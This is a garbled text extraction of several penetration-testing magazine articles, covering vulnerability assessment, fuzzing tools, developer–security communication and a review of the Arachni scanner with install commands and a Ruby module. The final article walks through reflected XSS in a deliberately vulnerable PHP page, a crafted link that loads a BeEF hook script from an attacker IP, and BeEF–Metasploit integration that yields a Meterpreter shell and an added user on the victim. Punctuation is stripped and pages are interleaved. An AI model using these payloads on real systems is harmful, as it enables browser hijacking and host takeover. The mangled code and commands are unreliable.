ConclusionA vulnerability assessment is the process of identifying prioritizing quantifying and ranking the vulnerabilities in a system where such process determines if there is
a weakness or vulnerabilities in the system subjected to the assessment Penetration testing includes all of the process in vulnerabilities assessment plus the exploitation of vulnerabilities found in the discovery phase
Unfortunately an all clear result from a penetration test doesnrsquot mean that an application has no problems Penetration tests can miss weakness such as session forging and brute-forcing detection and as such implementing security throughout an applicationrsquos lifecycle is imperative process for building secure web applications
As automated web application security tools have matured in the recent years and over time automated security assessment will continue to both reduce any uncertainty of determination (ie false positive results) and the potential to miss some issues (ie false negatives results)
Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications Currently the automated tools canrsquot be entirely used as a replacement of the manual penetration test However if the automated tools are used correctly organizations can save a lot of money and time in finding broad range of technical security vulnerabilities in web applications The manual penetration testing can be used to augment the results of the logical vulnerabilities found as a result of using the automated testing
Finally it is important to point out that over time the manual testing for technical vulnerabilities will increase from difficult to impossible as web applications size and the scope of such applications and their complexity increase The fact that many enterprise organizations will not be able to dedicate the time money and the effort required to assess the thousands of web applications will increase the chances of using the automated tools rather than using the human factor to manually testing these applications Also relying on human efforts to test for thousands of technical vulnerabilities within these applications is subject to the human errors and simply canrsquot be trusted
BRYAN SOLIMANBryan Soliman is a Senior Solution Designer currently working with Ontario Provincial Government of Canada He has over twenty years of Information Technology experience with Bachelor degree in Engineering bachelor degree in Computer Science and Master degree in Computer Science
WHAT IS A GOOD FUZZING TOOLFuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software It is based on sending anomalous (invalid or unexpected) data to the test target - the same method that is used by hack-ers and security researchers when they look for weaknesses to exploit There are no false positives if the anomalous data causes abnormal reaction such as a crash in the target software then you have found a critical security flaw
In this article we will highlight the most important requirements in a fuzzing tool and also look at the most common mistakes people make with fuzzing
Documented test cases When a bug is found it needs to be documented for your internal developers or for vulnerability management towards third party developers When there are billions of test cases automated documentation is the only possi-ble solution
Remediation All found issues must be reproduced in order to fix them Network recording (PCAP) and automated reproduction packages help you in delivering the exact test setup to the develop-ers so that they can start developing a fix to the found issues
MOST COMMON MISTAKES IN FUZZINGNot maintaining proprietary test scripts Proprietary tests scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported
Ticking off the fuzzing check-box If the requirement for testers is to do fuzzing they almost always choose the quick and dirty solution This is almost always random fuzzing Test requirements should focus on coverage metrics to ensure that testing aims to find most flaws in software
Using hardware test beds Appliance based fuzzing tools become outdated really fast and the speed requirements for the hardware increases each year Software-based fuzzers are scalable in performance and can easily travel with you where testing is needed and are not locked to a physical test lab
Unprepared for cloud A fixed location for fuzz-testing makes it hard for people to collaborate and scale the tests Be prepared for virtual setups where you can easily copy the setup to your colleagues or upload it to cloud setups
PROPERTIES OF A GOOD FUZZING TOOLThere are abundance of fuzzing tools available How to distin-guish a good fuzzer what are the qualities that a fuzzing tool should have
Model-based test suites Random fuzzing will certainly give you some results but to really target the areas that are most at risk the test cases need to be based on actual protocol models This results in huge improvement in test coverage and reduction in test execu-tion time
Easy to use Most fuzzers are built for security experts but in QA you cannot expect that all testers understand what buffer overflows are Fuzzing tool must come with all the security know-how built-in so that testers only need the domain expertise from the target system to execute tests
Automated Creating fuzz test cases manually is a time-consuming and difficult task A good fuzzer will create test cases automatically Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks
Test coverage Better test coverage means more discovered vulnerabilities Fuzzer coverage must be measurable in two aspects specification coverage and anomaly coverage
Scalable Time is almost always an issue when it comes to testing User must also have control on the fuzzing parameters such as test coverage In QA you rarely have much time for testing and therefore need to run tests fast Sometimes you can use more time in testing and can select other test completion criteria
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
Application Security members are considered like the tax man asking for money Security is sometimes seen as a cost to pay in order to get
an application into Production Actually it is a little of everyones fault Since Security people and Developers usually do not talk the same language it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve Letrsquos take a step back for a minute and let me clarify what I mean about language and communication Consider this scenario The Marketing department has asked for a brand new web portal that shows new products from the ACME corporation Marketers usually do not know anything about technology and they just want to hit the market with an aggressive campaign on the new product line Marketers might ask the developers something like Give us the latest Web 20 Social website enabled or something like that to impress the customers Plus they would like it as soon as possible and they provide a deadline that the developers must keep The developers brainstorm the idea write out some specifications and requirements start prototyping their ideas and eventually begin coding They are under pressure to meet the deadline and management usually presses even more to meet the proposed deadline Security slowly is pushed aside so that the coding and production can meet the deadline Most software architecture is not designed with security in mind and in project Gantt Charts there usually
are no security checkpoints included for code testing or allow time for security fixes or remediation
Developers are pushed to code the application so that they can meet the deadline Acceptance tests and functionality tests are passed and the application is almost ready for deployment when someone recalls something about security Hey we need to get this on-line So we need to open up firewall to allow access to it
The Security Application group asks for additional information about the application and request docu-mentation of how the application was built They do not see it from the developersrsquo point of view of meeting the deadline that Management has imposed on them
On the other side developers do not see the problem from a security perspective What risks to IT infrastructure will potentially be exposed if someone breaks into the new application
One solution to the problem is to execute a penetration tests on the application and look at the results Then security is happy since they can test the application and developers are happy once the penetration test report is complete Many times a Penetration Test report contains recommended mitigation steps that impose additional time restraints on the application delivery Reports usually contain just the symptom For example the report might have statements like a SQL injection is possible not the real root cause a parameter taken from a config file is not sanitized before utilization The report does not contain all
Developers are from Venus Application Security guys from
Mars
We know that Application Security people talk a different language than developers do whenever we publish a report make an assessment or when we review a software architecture from a security point of view There is a gap between developers and the Application Security group The two teams must interact with each other to reach the same goal of building secure code
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
but which is the right one to use to insure secure code development
NET has one single monolithic framework and Microsoft has invested money in security and it seems they did it the right way but it is not Open Source so professionals cannot contribute A generic framework based solution is not feasible What about APIrsquos Developers do know how to use APIrsquos and having security controls embedded into a single library can save the day when writing source code That is why OWASP introduced ESAPI project to provide a set of APIrsquos that developers can use to embed security controls into their code
The requested effort is minimal if compared to translate implement a filter policy into running code and you (as a security professional) now speak the same language as the developer This is a win-win approach The security team and the application developers are now on the same page and everyone is happy There is a third approach I will cover in a follow-up article It is the BDD approach BDD is the acronym for Behavior Driven Development which means that you start writing test cases (taking examples from the Ruby on Rails world you write most of time test beds using rspec and cucumber) modeling how the source code has to behave accordingly to the documentation or requirements specification Initially when you execute the test cases against your application there will probably be failures that need to be corrected The idea is straightforward Using the WAPT activity instead of a implement a filtering policy statement you will produce a set of rspeccucumber scenarios modeling how the source code can deal with malformed input Then the development team starts correcting the code until it passes all of the test cases and when testing is complete and all tests pass it will mean your source code has implemented a filtering policy How has development changed A new approach has been created to insure that the developers implement your remediation statement Now the developers understand how to handle malformed entry statements and why they are so important to the Application Security group
The next article we will see how to write some security tests using the BDD approach in order to help a generic Lava developer to deal with cross-site scripting vulnerabilities
of the information necessary to solve the problems at first glance The developers cannot mitigate all of the issues in time to meet the deadline so many times bug fixes are prolonged or pushed into the next revision of the software and in some cases they are never fixed Another problem is when the two groups talk to each other at the end of the whole process and they use a non-common-ground language that further confuses or annoys everyone and further pushes the groups further apart
Communications Breakdown You Give Me The ReportPenetration test reports are most of the times useless from the developers point of view because they do not give specific information where they can pinpoint where the problem is This is very ironic because the developers need to take full advantage of the security report since most of remediation is source code fixes
Security issues found in Penetration testing is not for the faint of heart There can be a lot of high-level security issues grouped by OWASP Top 10 (most of time) with some generic remediation steps such as implement an input filtering policy This information may not mean anything to a source code developer They want to know what module class or line where the problem exists so that they can fix it If provided enough time developers can eventually determine where the problem exists but usually they do not have the time to look through all of the code to find every testing error and still have time to get the application into production
Letrsquos Close the GapWhat we need to do is define a common ground where security can be integrated into source code somewhat painlessly Security should be transparent from the deve-lopment teamrsquos point of view This can be achieved by
bull Create a development framework that has security built into it
bull Design an API to be used by the application
Putting security into the framework is the Rails approach Railsrsquo developers added a security facility inside the frameworkrsquos helpers so developers inherit the secure input filtering SQL injection protection and CSRF protection token This is a huge step forward to assist developers with this problem This methodology works with a programming language that contains a secure framework for developing web application This is true for the Ruby community (other frameworks like Sinatra do have some security facilities as well) With the Java programming language community there are a lot of non-standardized frameworks available for Java developers
PAOLO PEREGOPaolo Perego is an application security specialist interested in xing the code he just broke with a web application penetration test Hersquos interested in code review and hersquos working on his own hybrid analysis tool called aurora He loves Ruby on Rails kernel hacking playing guitar and playing Tae kwon-do ITF martial art Hersquos an husband and a daddy and a startup wannabe You may want to check out Paolorsquos blog or looking at his about me page
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
Arachni is not a so-called inspection proxy such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open
Web Application Security project (OWASP) These tools are really meant to be used by a skilled consultant doing manual investigations of the application
Arachni can be better compared with commercial online scanners which will be directed to the application and produce a report with no further interaction by the user
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset and to must choose the best combination of tools possible for the job at hand Is Arachni worthwhile
Time for an in-depth review
Under the HoodAccording to the documentation Arachni offers the following
bull Simplicity everything is simple and straight-forward from a userrsquos or component developerrsquos point of view
bull A stable efficient and high-performance framework Arachni allows custom modules reports and plug-ins Developers can easily use the advanced framework features without knowing the nitty gritty details
Pulling the Legs of ArachniArachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos ldquoZapotekrdquo Laskos It got quite a good score for the detection of Cross-Site-Scripting and SQL Injection issues on the recently publicised vulnerability scanner benchmark by Shay-Chen
Table 1 Overview of Audit and Reconnaissance modules included with Arachni
Audit Modules Recon ModulesSQL injectionBlind SQL injection using rDiff analysisBlind SQL injection using timing attacksCSRF detectionCode injection (PHP Ruby Python JSP ASPNET)Blind code injection using timing attacks (PHP Ruby Python JSP ASPNET)LDAP injectionPath traversalResponse splittingOS command injection (nix Windows)Blind OS command injection using timing attacks (nix Windows)Remote le inclusionUnvalidated redirectsXPath injectionPath XSSURI XSSXSSXSS in event attributes of HTML elementsXSS in HTML tagsXSS in HTML script tags
Allowed HTTP methodsBack-up lesCommon directoriesCommon lesHTTP PUTInsufficient Transport Layer Protection for password formsWebDAV detectionHTTP TRACE detectionCredit Card number disclosureCVSSVN user disclosurePrivate IP address disclosureCommon backdoorshtaccess LIMIT miscongurationInteresting responsesHTML object grepperE-mail address disclosureUS Social Security Number disclosureForceful directory listing
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
talks to one or more dispatchers that will perform the scanning job New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid)
This is great if you want to speed up the scan or if you want to execute some crazy things like running
We can vouch that both simplicity and performance goals have been attained by Arachni Since the framework is still under heavy development stability is sometimes lacking but at no time this interfered with our vulnerability assessments
Arachni is highly modular both from an architecture point of view as a source code point of view The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan The connection to these dispatchers can be secured by SSL encryption and cert based authentication One dispatcher can handle multiple clients Multiple dispatchers can share a load and communicate with each other to optimise and speed-up the scanning process
The asynchronous scanning engine supports both HTTP and HTTPS and has pauseresume functionality Arachni supports upstream proxies (for SOCKS4 SOCKS4A SOCKS5 HTTP11 and HTTP10) as well as proxy authentication
The scanner can authenticate versus the web application using form-based authentication HTTP Basic and Digest Authentication and NTLM
At the start of every scan a crawler will try to detect all pages In version 03 this was optional but since version 04 the crawler will always be run at the start of the scan This crawler has filters for redundant pages based on regular expressions and counters and can include or exclude URLs based on regular expressions Optionally the crawler can also follow subdomains There is also an adjustable link count and redirect limit
The HTML parser can extract forms links cookies and headers It can graciously handle badly written HTML due to a combination of regular expression analysis and the Nokogiri HTML parser
Arachni offers a very simple and easy to use module API enabling a developer to access helper audit methods and writing custom modules in a matter of minutes Arachni already includes a large number of modules audit modules and reconnaissance (recon) modules Table 1 provides an overview
Arachni offers report management The following reports can be created standard output HTML XML TXT YAML serialization and the Metareport providing Metasploit integration for automated and assisted exploitation
Arachni has many build-in plug-ins that have direct access to the framework instance Plug-ins can be used to add any functionality to Arachni Table 2 provides an overview of currently available plug-ins
InstallationArachni consists of client-side (web or shell) and server-side functionality (the dispatchers) A client
Table 2 Included Arachni plug-ins Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni
Plug-insPassive Proxy Analyses requests and responses
between the web application and the browser assisting in AJAX audits logging-in andor restricting the scope of the audit
Form based AutoLogin Performs an automated login
Dictionary attacker Performs dictionary attacks against HTTP Authentication and Forms based authentication
Proler Performs taint analysis with benign inputs and response time analysis
Cookie collector Keeps track of cookies while establishing a timeline of the changes
Healthmap Generates a sitemap showing the health (vulnerability present or not) of each crawledaudited URL
Content-types Logs content-types of server responses aiding in the identication of interesting (possibly leaked) les
WAF (Web Application Firewall) Detector
Establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes
Metamodules Loads and runs high-level meta-analysis modules premidpost-scanAutoThrottle Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilizationTimeoutNotice Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with It also points out the danger of DOS (Denail-of-Service) attacks against pages that perform heavy-duty processingUniformity Reports inputs that are uniformly vulnerable across a number of pages hinting to the lack of a central point of input sanitization
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
your dispatchers in multiple geographic zones thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers
Letrsquos get our hands dirty and start with the experimental branch (currently at version 04) so we can work with the latest and greatest functionality Another benefit is that this experimental version can work under Windows
Installation under Linux is quick and easy but a Windows set-up requires the installation of Cygwin first Cygwin is a collection of tools that provide a Linux-like environment on Windows as well as providing a large part of Linux APIs Another possibility is to run it natively in Windows using MinGW (Minimalistic GNU for Windows) but at this moment there are too many problems involved with that
LinuxInstallation under Linux is quite straightforward Open your favourite shell and execute the following commands Listing 1
This will install all source directories in your home directory Change all the cd commands if you want the sources somewhere else In case you need an update to the latest versions just cd into the three directories above and perform
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni If you encounter a Typhoeus related error while running Arachni issue
$ gem clean
WindowsArachni comes with decent documentation but I had a chuckle when I read the installation instructions for Windows Windows users should run Arachni in Cygwin I knew that this was not going to be a smooth ride Since v03 some changes have been made to the experimental version to make it easier so here we go
Please note that these installation instructions start with the installation of Cygwin and all required dependencies
Install or upgrade Cygwin by running setupexe Apart from the standard packages include the following
bull Database libsqlite3-devel libsql3_0bull Devel doxygen libffi4 gcc4 gcc4-core gcc4-g++
git libxml2 libxml2-devel make openssl-develbull Editors nanobull Libs libxslt libxslt-devel libopenssl098 tcltk
libxml2 libmpfr4bull Net libcurl-devel libcurl4
Listing 1 Installation for Linux
$ sudo apt-get install libxml2-dev libxslt1-dev
libcurl4-openssl-dev libsqlite3-
dev
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ $ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2 Installation for Windows
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
Accept the installation of packages that are required to satisfy dependencies Note that some of your other tools might not work with these libraries or upgrades In any case an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand First we need to install libffi Execute the following commands in your Cygwin shell
$ cd
$ git clone httpgithubcomatgreenlibffigit
$ cd libffi
$ configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml Download the latest stable version of libyaml (currently 014) from http httppyyamlorgwikiLibYAML and move it to your Cygwin home folder (probably Ccygwinhomeyour _ windows _ id) Execute the following
$ cd
$ tar xvf yaml-014targz
$ cd yaml-014
$ configure
$ make
$ make install
Now we need to compile and install Ruby Download the latest stable release of Ruby (currently ruby-192-p290targz) from http httpwwwrubyorg and move it to your Cygwin home folder Execute the following commands in the Cygwin shell
$ cd
$ tar xvf ruby-192-p290targz
$ cd ruby-192-p290
$ configure
$ make
$ make install
From your Cygwin shell update and install some necessary modules
$ gem update ndashsystem
$ gem install rake-compiler
$ cd
$ git clone httpgithubcomdjberg96sys-proctablegit
$ cd sys-proctable
$ gem build sys-proctablegemspec
$ gem install sys-proctable-091-x86-cygwingem
Finally we can install Arachni (and the source) by executing the following commands in the Cygwin shell (note these are the same commands as with the Linux installation) Listing 2
In case of weird error-messages (especially on Vista systems) regarding fork during compilation execute the following in your Cygwin shell
$ find usrlocal -iname lsquosorsquo gt tmplocalsolst
Quit all Cygwin shells Use Windows to browse to Ccygwinbin Right click ashexe and choose run as administrator Enter in ash
$ binrebaseall
$ binrebaseall -T tmplocalsolst
Exit ash
Light my FireHow to fire up Arachni depends on whether you want to use it with the new (since version 03) web GUI or simply run everything through the command-line interface Note that the current web GUI does not support all functionality that is available from the command-line
The GUI can be started by executing the following commands
$ arachni_rpcd amp
$ arachni_web
After that browse to httplocalhost4567 and admire the new GUI You will need to attach the GUI to one or more dispatchers The dispatcher(s) will run the actual scan
Figure 1 Edit Dispatchers
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
If you want to use the command-line interface just execute
$ arachni --help
A quick overview of the other screens (Figure 1)
bull Start a Scan start a scan by entering the URL and pressing Launch scan After a scan is launched the screen gives an overview of what issues are detected and how far the process is
bull Modules enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site-Scripting (XSS) SQL Injection (SQLi) Cross-Site-Request Forgery (CSRF) or detect hidden features or simply make lists of interesting items such as email addresses
bull Plugins plug-ins help to automate tasks Plug-ins are more powerful than modules and enable to script login sequences detect Web Application Firewalls (WAF) perform dictionary attacks hellip
bull Settings the settings screens allows to add cookies and headers limit the scan to certain directories hellip
bull Reports gives access to the scan reports Arachni creates reports in its own internal format and exports them to HTML XML or text
bull Add-ons three add-ons are installedbull Auto-deploy converts any SSH enabled Linux
box in an Arachni dispatcherbull Tutorial serves as an examplebull Scheduler schedules and run scan jobs at a
specific timebull Log overview of actions taken by the GUI
Your First ScanWe will use both the command-line and the GUI First the command-line start a scan with all modules active This is extremely easy
$ arachni httpwwwexamplecom --report =afroutfile=
wwwexamplecomafr
Afterwards the HTML report can be created by executing the following
$ arachni --repload=wwwexamplecomafr --report=html
outfile=wwwexamplecomhtml
Thatrsquos it Enabling or disabling modules is of course possible Execute the following command for more information about the possibilities of the command-line interface
$ arachni --help
Usually it is not necessary to include all recon modules Some modules will create a lot of requests making detection of your activities easier (if that is a problem with your assignment) and taking a lot more time to finish List all modules with the following command
$ arachni --lsmod
Enabling or disabling modules is easy use the --mods switch followed by a regular expression to include modules or exclude modules by prefixing the regular expression with a dash Example
$ arachni --mods= -xss_ httpwwwexamplecom
The above will load all modules except the module related with Cross-Site-Scripting (XSS)
Using the GUI makes this process even easier Open the GUI by browsing to httplocalhost4567 and accept the default dispatcher
Next steps are to verify the settings in the Settings Modules and Plugins screens Once you are satisfied proceed to the Start a Scan screen
If you want to run a scan against some test applications visit my blog for the list of deliberately vulnerable applications Most of these applications can be installed locally or can be attacked online (please read all related faqs and permissions before scanning a site In most jurisdictions this is illegal unless permission is explicitly granted by the owner)
After the scan just go the Reports screen and download the report in the format you wantFigure 2 Start a scan screen
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
Listing 3 Create your own module
=begin
Arachni
Copyright (c) 2010-2011 Tasos Zapotek Laskos
tasoslaskosgmailcom
This is free software you can copy and distribute
and modify
this program under the term of the GPL v20 License
(See LICENSE file for details)
=end
module Arachni
module Modules
Looks for common files on the server based on
wordlists generated from open
source repositories
More information about the SVNDigger wordlists
httpwwwmavitunasecuritycomblogsvn-digger-
better-lists-for-forced-browsing
The SVNDigger word lists were released under the GPL
v30 License
author Herman Stevens
see httpcwemitreorgdatadefinitions538html
class SvnDiggerDirs lt ArachniModuleBase
def initialize( page )
super( page )
end
def prepare
to keep track of the requests and not repeat them
__audited ||= Setnew
__directories ||=[]
return if __directoriesempty
read_file( all-dirstxt )
|file|
__directories ltlt file unless fileinclude( )
end
def run( )
path = get_path( pageurl )
return if __auditedinclude( path )
print_status( Scanning SVNDigger Dirs )
__directorieseach
|dirname|
url = path + dirname +
print_status( Checking for url )
log_remote_directory_if_exists( url )
|res|
print_ok( Found dirname at +
reseffective_url )
__audited ltlt path
def selfinfo
name =gt SVNDigger Dirs
description =gt qFinds directories
based on wordlists created from
open source repositories The
wordlist utilized by this module
will be vast and will add a consi
derable amount of
time to the overall scan time
author =gt Herman Stevens ltherman
stevensgmailcomgt
version =gt 01
references =gt
Mavituna Security =gt
httpwwwmavitunasecuritycom
blogsvn-digger-better-lists-for-
forced-browsing
OWASP Testing Guide =gt
httpswwwowasporgindexphp
Testing_for_Old_Backup_and_
Unreferenced_Files_(OWASP-CM-006)
targets =gt Generic =gt all
issue =gt
name =gt qA SVNDigger
directory was detected
description =gt q
tags =gt [ svndigger path
directory discovery ]
cwe =gt 538
severity =gt IssueSeverityINFORMATIONAL
cvssv2 =gt
remedy_guidance =gt Review these
resources manually Check if
unauthorized interfaces are exposed
or confidential information
remedy_code =gt
end
end
end
end
WEB APP VULNERABILITIES
Page 28 httppentestmagcom012011 (1) November
Create your Own ModuleArachni is very modular and can be easily extended In the following example we create a new reconnaissance module
Move into your Arachni source tree Yoursquoll find the modules directory In there yoursquoll find two directories audit and recon Move into the recon directory We will create our Ruby module
Arachni makes it real easy if your module needs external files it will search into a subdirectory with the same name Example if you create a svn_digger_dirsrb module this module is able to find external files in the modulesreconsvn_digger_dirs subdirectory
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing These wordlists are based on directories found in open source code repositories
If there is a directory that needed to be protected and you forget that it will be found by a scanner that uses these wordlists
Furthermore it can be used as a basis for reconnaissance if a directory or file is detected this might provide clues about what technology the site is using
Download the wordlists from the above URL Create a directory modulesreconsvn_digger_dirs and move the file all-dirstxt from the wordlist archive to the newly created directory
Create a copy of the file modulesreconcommon_
directoriesrb and name it svn_digger_dirsrb Change the code to read as follows Listing 3
The code does not need a lot of explanation it will check whether or not a specific directory exists if yes it will forward the name to the Arachni Trainer (who will include the directory in the further scans) as well as create a report entry for it
Note the above code as well as another module based on the SVNDigger wordlists with filenames are now part of the experimental Arachni code base
ConclusionWe used Arachni in many of our application vulnerability assessments The good points are
bull Highly scalable architecture just create more servers with dispatchers and share the load This makes the scanner a lot more responsive and fast
bull Highly extensible create your own modules plug-ins and even reports with ease
bull User-friendly start your scan in minutesbull Very good XSS and SQLi detection with very few
false positives There are false negatives but this
is usually caused by Arachni not detecting the links to be audited This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy
bull Excellent reporting capabilities with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE)
Arachni lacks support for the following
bull No AJAX and JSON supportbull No JavaScript support
This means that you need to help Arachni finding links hidden in JavaScript eg by using it as a proxy between your browser and the web application Yoursquoll need a different tool (or use your brain and manual tests) to check for AJAXJSON related vulnerabilities in the application you are testing
Arachni also cannot examine and decompile Flash components but a lot of tools are at hand to help you with that Arachni does not perform WAF (Web Application Firewall) evasion but then again this is not necessarily difficult to do manually for a skilled consultant or hacker
And why not write your own module or plug-in that implements the missing functionality Arachni is certainly a tool worth adding to your toolkit
HERMAN STEVENSAfter a career of 15 years spanning many roles (developer security product trainer information security consultant Payment Card Industry auditor application security consultant) Herman Stevens now works and lives in Singapore where he is the director of his company Astyran Pte Ltd (httpwwwastyrancom) Astyran specialises in application security such as penetration tests vulnerability assessments secure code reviews awareness training and security in the SDLC Contact Herman through email (hermanstevensgmailcom) or visit his blog (httpblogastyransg)
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
In most commercial penetration testing reports itrsquos sufficient to just show a small alert popup this is to show that a particular parameter is vulnerable to
an XSS attack However this is not how an attacker would function in the real world Sure hersquod use a pop up initially to find out which parameter is vulnerable to an XSS attack Once hersquos identified that though hersquoll look to steal information by executing malicious JavaScript or even gain total control of the userrsquos machine
In this article wersquoll look at how an attacker can gain complete control over a userrsquos browser ultimately taking over the userrsquos machine by using Beef (A browser exploitation framework)
A Simple POCTo start off though letrsquos do exactly what the attacker would do which is to identify a vulnerability For simplicityrsquos
sake wersquoll assume that the attacker has already identified a vulnerable parameter on a page Here are the relevant files which you too can use on your web server if you want to try this also
HTML Page
ltHTMLgt
ltBODYgt
ltFORM NAME=rdquotestrdquo action=rdquosearch1phprdquo method=rdquoGETrdquogt
Search ltINPUT TYPE=rdquotextrdquo name=rdquosearchrdquogtltINPUTgt
ltINPUT TYPE=rdquosubmitrdquo name=rdquoSubmitrdquo value=SubmitgtltINPUTgt
ltFORMgt
ltBODYgt
ltHTMLgt
XSS Beef Metaspoilt Exploitation
Figure 2 BeeF after conguration
Cross Site scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code on the victimrsquos browser The impact of an XSS attack is only limited by the potency of the attackerrsquos JavaScript code
Figure 1 User enters in a search box
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
and click a few buttons to configure it Alternatively you could use a distribution like Backtrack which already has BeeF installed Here is a screenshot of how BeeF looks after it is configured (Figure 2)
Instead of the user clicking on a link which will generate a popup box the user will instead be tricked to click on a link which tells his browser to connect to the BeeF controller The URL that the user has to click on is
httplocalhostsearch1phpsearch=ltscript src=
rsquohttp19216856101beefhookbeefmagicjsphprsquogt
ltscriptgtampSubmit=Submit
The IP address here is the one on which you have BeeF running Once the user clicks on the link above you should see an entry in the BeeF controller window showing that a Zombie has connected You can see this in the Log section on the right hand side or the Zombie section on the left hand side Here is a screenshot which shows that a browser has connected to the Beef controller (Figure 3)
Click and highlight the zombie in the left pane and then click on Standard Modules ndash Alert Dialog This will result in a little popup box popping up on the victim machine Herersquos a screenshot which shows the same (Figure 4) And this is what the victim will see (Figure 5)
So as you can see because of Beef even an unskilled attacker can run code which he does not even understand on the victimrsquos machine and steal sensitive data Hence it becomes all the more
Server Side PHP Code
ltphp
$a=$_GET[lsquosearchrsquo]
echo bdquoThe parameter passed is $ardquo
gt
As you can see itrsquos some very simple code where the user enters something in a search box on the first page his input is sent to the server which reads the value of the parameter and prints it on to the screen So instead of a simple text input the attack enters a simple JavaScript into the box the JavaScript will execute on the userrsquos machine and not get displayed The user hence has to just been tricked into clicking on a link httplocalhostsearch1phpsearch=ltscriptgtalert(documentdomain)ltscriptgt
The screenshot below clarifies the above steps (Figure 1)
Beef ndash Hook the userrsquos browserNow while this example is sufficient to prove that the site is vulnerable to XSS itrsquos most certainly not what an attacker will stop at An attacker will use a tool like BeeF (Browser Exploitation Framework) to gain more control of the userrsquos browser and machine
I used an older version of Beef(032) as I just wanted to demonstrate what you can do with such a tool The newer version has been rewritten completely and has many more features For now though extract Beef from the tarball and copy it into your web server directory
Figure 3 Connection with BeeF controller
Figure 4 What attacer will see
Figure 5 What victim will see
Figure 6 Defacing the current Web Page
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
important to protect against XSS Wersquoll have a small section right at the end where I briefly tell you how to mitigate XSS
Irsquoll quickly discuss a few more examples using Beef before we move on to using it as a platform for other attacks Here are the screenshots for the same these are all a result of clicking on the various modules available under the Standard Modules menu
Defacing the Current Web PageThis results in the webpage being rewritten on the victim browser with the text in the lsquoDEFACE STRINGrsquo box Try it out (Figure 6)
Detect all Plugins on the Userrsquos BrowserThere are plenty of other plug-ins inside Beef under the Standard Modules and Browser modules tab which you can try out for yourself I wonrsquot discuss all of them here as the principle is the same What I want to do now though is use the userrsquos hooked Browser to take complete control of the userrsquos machine itself (Figure 7)
Integrate Beef with Metasploit and get a shellEdit Beefrsquos configuration files so that it can directly talk to Metasploit All I had to edit was msfphp to set the correct IP address Once this is done you can launch Metasploitrsquos browser based exploits from inside Beef
Figure 7 Detecting plugins on the user browser
Figure 8 startin Metaslpoit
Figure 9 bdquoJobsrdquo command
Figure 10 Metasploit after clicking bdquoSend Nowrdquo
Figure 11 Meterpreter window - screenshot 1
Figure 12 Meterpreter window - screenshot 2
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
Now first ensure that the Zombie is still connected Then click on Standard modules ndash Browser Exploit and configure the exploit as per the screenshot below Wersquore basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8)
Open a shell and run msfconsole to start metasploit Once you see the msfgt prompt click the zombie in the browser and click the Send Now button to send the exploit payload to the victim You can immediately check if Beef can talk to Metasploit by running the jobs command (Figure 9)
If the victimrsquos browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit) it will connect back to the running Metasploit instance Herersquos what you see in Metasploit a while after you click Send Now (Figure 10)
Once yoursquove got a prompt yoursquore on that remote system and can do anything that you want with the privileges of that user Here are a few more screenshots of what you can do with Meterpreter The screenshots are self explanatory so I wonrsquot say much (Figure 11-13)
The user was apparently logged in with admin privileges and we could create a user by the name dennis on the remote machine At this point of time we have complete control over 1 machine
